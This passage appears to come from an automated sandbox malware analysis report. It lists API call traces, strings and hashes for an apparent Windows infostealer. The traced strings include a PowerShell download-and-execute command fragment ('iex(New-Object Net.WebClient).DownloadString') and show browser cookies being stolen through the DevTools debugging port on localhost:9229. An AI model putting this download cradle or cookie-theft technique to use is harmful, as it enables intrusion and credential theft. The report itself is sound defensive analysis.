                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 003B4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 003B4895
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 4fca21ca1a454d60859ad96db5fc538e1f75436cc13d937c209a7c74aa11c9e6
                                • Instruction ID: 936ea46a0b11e41a340d2c158e1129362cc3f6b1f86a55aee188f004bc2f1a4a
                                • Opcode Fuzzy Hash: 4fca21ca1a454d60859ad96db5fc538e1f75436cc13d937c209a7c74aa11c9e6
                                • Instruction Fuzzy Hash: E4119C71952F20EFCB129FB5AC0DFA63ABCBA29705309081EF551E2260DAF45848FB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE53
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ABE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ABEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 003ABEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003ABEEB
                                • lstrlen.KERNEL32(')"), ref: 003ABEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 003ABF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ABF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 003ABF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003ABFBA
                                • ShellExecuteEx.SHELL32(?), ref: 003AC00C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: b99d6f5159d3eb1cd11c25899b32b281ae185cb8407c038fcbd788dc49bcdf20
                                • Instruction ID: 8f269bebd85f853f07730e831e812f2793bea7d5ff39664807092b6bf8fa1699
                                • Opcode Fuzzy Hash: b99d6f5159d3eb1cd11c25899b32b281ae185cb8407c038fcbd788dc49bcdf20
                                • Instruction Fuzzy Hash: 75619431A11A1AAFCF23AFB59C49EAFBBA8EF15300F051429F505E7202DB34C9158B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                                • lstrlen.KERNEL32(00F66F50), ref: 003B1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                                • lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                                • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                                • lstrlen.KERNEL32(00F66FD0), ref: 003B1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B196C
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1977
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19A6
                                • lstrlen.KERNEL32(003C4FA0), ref: 003B19B8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B19D9
                                • lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B19E5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A14
                                • lstrlen.KERNEL32(00F66FB0), ref: 003B1A2A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A51
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1A5C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1A8B
                                • lstrlen.KERNEL32(00F66FC0), ref: 003B1AA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1AC8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003B1AD3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1B02
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen
                                • String ID:
                                • API String ID: 1049500425-0
                                • Opcode ID: 6bde7931071b7e2b8cca03aa1226f1f67a430859662aa25891c45fbfa894fefc
                                • Instruction ID: 933162fc1c724cb21f72408b139d4b22db550cb977e0199a2d6c2b936e0d37ee
                                • Opcode Fuzzy Hash: 6bde7931071b7e2b8cca03aa1226f1f67a430859662aa25891c45fbfa894fefc
                                • Instruction Fuzzy Hash: 83917E71601B03AFDB229FB5DCA8E6BB7E8EF14304B554828B986C7651DB34EC45CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4793
                                • LocalAlloc.KERNEL32(00000040,?), ref: 003A47C5
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4812
                                • lstrlen.KERNEL32(003C4B60), ref: 003A481D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A483A
                                • lstrcat.KERNEL32(00000000,003C4B60), ref: 003A4846
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A486B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4898
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A48A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A48CA
                                • StrStrA.SHLWAPI(?,00000000), ref: 003A48DC
                                • lstrlen.KERNEL32(?), ref: 003A48F0
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4931
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A49B8
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A49E1
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4A0A
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4A30
                                • lstrcpy.KERNEL32(00000000,?), ref: 003A4A5D
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 4107348322-3310892237
                                • Opcode ID: 986eee9d89a94f42d7b9b276d8a8f00bb9b979989121b6b511ae58fadd63fee5
                                • Instruction ID: 96b3f336711d176b6603e180c4ffa54eb5a524c25c3169909852ff0bb205b95f
                                • Opcode Fuzzy Hash: 986eee9d89a94f42d7b9b276d8a8f00bb9b979989121b6b511ae58fadd63fee5
                                • Instruction Fuzzy Hash: FDB18232A11A06ABCF23EF75D84A9AF77B9EF95300F054528F8469B211DB74EC158B90
                                APIs
                                  • Part of subcall function 003990C0: InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                                  • Part of subcall function 003990C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                                  • Part of subcall function 003990C0: InternetCloseHandle.WININET(00000000), ref: 00399109
                                • strlen.MSVCRT ref: 003992E1
                                • strlen.MSVCRT ref: 003992FA
                                  • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                • strlen.MSVCRT ref: 00399399
                                • strlen.MSVCRT ref: 003993E6
                                • lstrcat.KERNEL32(?,cookies), ref: 00399547
                                • lstrcat.KERNEL32(?,003C1794), ref: 00399559
                                • lstrcat.KERNEL32(?,?), ref: 0039956A
                                • lstrcat.KERNEL32(?,003C4B98), ref: 0039957C
                                • lstrcat.KERNEL32(?,?), ref: 0039958D
                                • lstrcat.KERNEL32(?,.txt), ref: 0039959F
                                • lstrlen.KERNEL32(?), ref: 003995B6
                                • lstrlen.KERNEL32(?), ref: 003995DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00399614
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                • API String ID: 1201316467-3542011879
                                • Opcode ID: 2b116b1a1292ce08e8ae39423b3910b4a543b2b726da13f1e52e465374f8e14e
                                • Instruction ID: d5eab7d7ebc6c307d9019f3d59596ff68d0d8d8853ab99a292ec891ee9603258
                                • Opcode Fuzzy Hash: 2b116b1a1292ce08e8ae39423b3910b4a543b2b726da13f1e52e465374f8e14e
                                • Instruction Fuzzy Hash: 36E11471E11219EFDF12DFA8D885BDEBBB5BF48300F1044AAE509A7241DB30AE45CB95
                                APIs
                                • memset.MSVCRT ref: 003AD9A1
                                • memset.MSVCRT ref: 003AD9B3
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AD9DB
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ADA0E
                                • lstrcat.KERNEL32(?,00000000), ref: 003ADA1C
                                • lstrcat.KERNEL32(?,00F7F3E8), ref: 003ADA36
                                • lstrcat.KERNEL32(?,?), ref: 003ADA4A
                                • lstrcat.KERNEL32(?,00F7DDB0), ref: 003ADA5E
                                • lstrcpy.KERNEL32(00000000,?), ref: 003ADA8E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 003ADA95
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003ADAFE
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                                • Instruction ID: b1543c71834db903fd512f1a941f0e5963fa0d610ee7fec1c1e2e7766563a2d6
                                • Opcode Fuzzy Hash: a708292d9a5ee2c14a076dba10e22839f3b700a01096cd4dfcf580e215855533
                                • Instruction Fuzzy Hash: 7EB19EB2910659AFCF12EFA4DC889EE77B9FF49300F054569E906E7250DB309E49CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039B330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039B3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B3D9
                                • lstrlen.KERNEL32(003C4C50), ref: 0039B450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B474
                                • lstrcat.KERNEL32(00000000,003C4C50), ref: 0039B480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B4A9
                                • lstrlen.KERNEL32(00000000), ref: 0039B52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039B55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B587
                                • lstrlen.KERNEL32(003C4AD4), ref: 0039B5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B622
                                • lstrcat.KERNEL32(00000000,003C4AD4), ref: 0039B62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B65E
                                • lstrlen.KERNEL32(?), ref: 0039B767
                                • lstrlen.KERNEL32(?), ref: 0039B776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039B79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                                • Instruction ID: a1705d176a3d4634c2c334326bb6c95ab645581bb409427e443ca518d306efa7
                                • Opcode Fuzzy Hash: e064fe6938770e434da60fb0de6bde7647be707e3c5d3d9a10b6211d65370111
                                • Instruction Fuzzy Hash: 56023D31A01606DFCF26DF65EA89B6AF7F5AF54304F1A806DE4099B261DB31DC46CB80
                                APIs
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • RegOpenKeyExA.ADVAPI32(?,00F7BD60,00000000,00020019,?), ref: 003B37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 003B37F7
                                • wsprintfA.USER32 ref: 003B3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 003B3840
                                • RegCloseKey.ADVAPI32(?), ref: 003B384E
                                • RegCloseKey.ADVAPI32(?), ref: 003B3858
                                • RegQueryValueExA.ADVAPI32(?,00F7F298,00000000,000F003F,?,?), ref: 003B38A1
                                • lstrlen.KERNEL32(?), ref: 003B38B6
                                • RegQueryValueExA.ADVAPI32(?,00F7F2B0,00000000,000F003F,?,00000400), ref: 003B3927
                                • RegCloseKey.ADVAPI32(?), ref: 003B3972
                                • RegCloseKey.ADVAPI32(?), ref: 003B3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                                • Instruction ID: e0e2fc74a45a3f3dc35e87259cd0d9bfaf6e11fd2eb8cae3db18af52b2dd5e37
                                • Opcode Fuzzy Hash: 77ff527ca365cbead0f21d46a64287350f3ea25de6fc34a5e71272293c79b25e
                                • Instruction Fuzzy Hash: 7491BD729002189FCB11DFA4CC85EEEB7B9FF88314F158569E609AB611DB31AE45CF90
                                APIs
                                • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 003990DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003990FC
                                • InternetCloseHandle.WININET(00000000), ref: 00399109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 00399166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00399197
                                • InternetCloseHandle.WININET(00000000), ref: 003991A2
                                • InternetCloseHandle.WININET(00000000), ref: 003991A9
                                • strlen.MSVCRT ref: 003991BA
                                • strlen.MSVCRT ref: 003991ED
                                • strlen.MSVCRT ref: 0039922E
                                • strlen.MSVCRT ref: 0039924C
                                  • Part of subcall function 00398980: std::_Xinvalid_argument.LIBCPMT ref: 00398996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 32f07e25f6d9cbe40d770a9474479f8f6ddab82569df5f0a5bf1928eb8735cff
                                • Instruction ID: e34de0c44470fa8f2d05f69d0f68e3b72584de7d751cea7d88c2b6927aed8324
                                • Opcode Fuzzy Hash: 32f07e25f6d9cbe40d770a9474479f8f6ddab82569df5f0a5bf1928eb8735cff
                                • Instruction Fuzzy Hash: 6151E471600209ABDB21DFA8DC85FEEF7F9EB48710F140469F545E7280DBB4AE4887A1
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 003B16A1
                                • lstrcpy.KERNEL32(00000000,00F6A798), ref: 003B16CC
                                • lstrlen.KERNEL32(?), ref: 003B16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 003B1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B172A
                                • lstrlen.KERNEL32(00F7EAF0), ref: 003B173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 003B1762
                                • lstrcat.KERNEL32(00000000,00F7EAF0), ref: 003B176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1792
                                • ShellExecuteEx.SHELL32(?), ref: 003B17CD
                                • ExitProcess.KERNEL32 ref: 003B1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                                • Instruction ID: 49026b5af6de7848f447f60593de6a1cd97d4a936e74a44478f7aee095ad4053
                                • Opcode Fuzzy Hash: 7c3c69ffa7a44a8a471912c84cb4bafcb40ab63054a3b77d618b4bdc1947bbc0
                                • Instruction Fuzzy Hash: A651A171A01A1AAFCB12DFA4CC99ADEB7F9AF54300F454125E605E7251DF30AE05CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF026
                                • lstrlen.KERNEL32(00000000), ref: 003AF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 003AF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 003AF081
                                • lstrlen.KERNEL32(?), ref: 003AF094
                                • lstrlen.KERNEL32(00000000), ref: 003AF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                                • Instruction ID: 8d9a2fc1dd86a513172436172ea29d5ebd9c77c5b2dac971591f82754069d27d
                                • Opcode Fuzzy Hash: ee5b8604cd59b7c91161beb9847676a871656cd5fa3b0780f7ea335d06301ecc
                                • Instruction Fuzzy Hash: 05515C36911905AFCB23EBB8D859EAF77A4EF56700F064568E846DB212DF30DC058B94
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(00F78A68,005C9BD8,0000FFFF), ref: 0039A026
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039A053
                                • lstrlen.KERNEL32(005C9BD8), ref: 0039A060
                                • lstrcpy.KERNEL32(00000000,005C9BD8), ref: 0039A08A
                                • lstrlen.KERNEL32(003C4C4C), ref: 0039A095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0B2
                                • lstrcat.KERNEL32(00000000,003C4C4C), ref: 0039A0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0039A0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0039A114
                                • SetEnvironmentVariableA.KERNEL32(00F78A68,00000000), ref: 0039A12F
                                • LoadLibraryA.KERNEL32(00F65188), ref: 0039A143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
